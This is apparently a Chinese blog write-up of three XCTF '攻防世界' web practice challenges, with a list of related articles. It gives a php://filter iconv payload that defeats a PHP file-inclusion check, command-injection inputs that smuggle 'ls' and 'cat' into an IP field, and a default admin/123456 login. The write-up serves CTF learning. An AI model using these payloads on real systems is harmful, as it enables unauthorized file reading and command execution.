攻防世界web篇(五)

简介: 攻防世界web篇(五)

攻防世界web篇(五)

文件包含

<?php
highlight_file(__FILE__);
    include("./check.php");
    if(isset($_GET['filename'])){
        $filename  = $_GET['filename'];
        include($filename);
    }
?>

首先尝试测试

经过尝试后发现read被ban掉了,这里参考了一下官方的wp

UCS-4*

UCS-4BE

UCS-4LE*

UCS-2

UCS-2BE

UCS-2LE

UTF-32*

UTF-32BE*

UTF-32LE*

UTF-16*

UTF-16BE*

UTF-16LE*

UTF-7

UTF7-IMAP

UTF-8*

ASCII*

EUC-JP*

SJIS*

eucJP-win*

SJIS-win*

\具体支持的编码可见php官方文档

\https://www.php.net/manual/zh/mbstring.supported-encodings.php

利用iconv进行编码

/?filename=php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php

command_execution

127.0.0.1 |ls /home

127.0.0.1  | cat /home/flag.txt

weak_auth

小宁写了一个登陆验证页面,随手就设了一个密码。

账号密码admin/123456

相关文章
|
4天前
|
SQL 前端开发 Java
《CTF攻防世界web题》之茶壶我爱你(2)
《CTF攻防世界web题》之茶壶我爱你(2)
28 0
|
4天前
|
前端开发 Java 计算机视觉
《CTF攻防世界web题》之我什么都不会(1)
《CTF攻防世界web题》之我什么都不会(1)
35 0
|
5月前
|
存储 搜索推荐 PHP
攻防世界 初识web
攻防世界 初识web
33 0
|
10月前
|
安全
Web 安全 — CSRF 的原理和攻防
Web 安全 — CSRF 的原理和攻防
88 0
|
10月前
|
安全 存储 前端开发
Web 安全 — XSS 的原理和攻防
Web 安全 — XSS 的原理和攻防
122 0
Web 安全 — XSS 的原理和攻防
|
12月前
|
安全 PHP
攻防世界web进阶
攻防世界web进阶
|
前端开发 安全 JavaScript
|
安全 PHP Python
攻防世界 web篇(六)
攻防世界 web篇(六)
233 0
攻防世界 web篇(六)
|
PHP Python
攻防世界 web篇(四)
攻防世界 web篇(四)
133 0
攻防世界 web篇(四)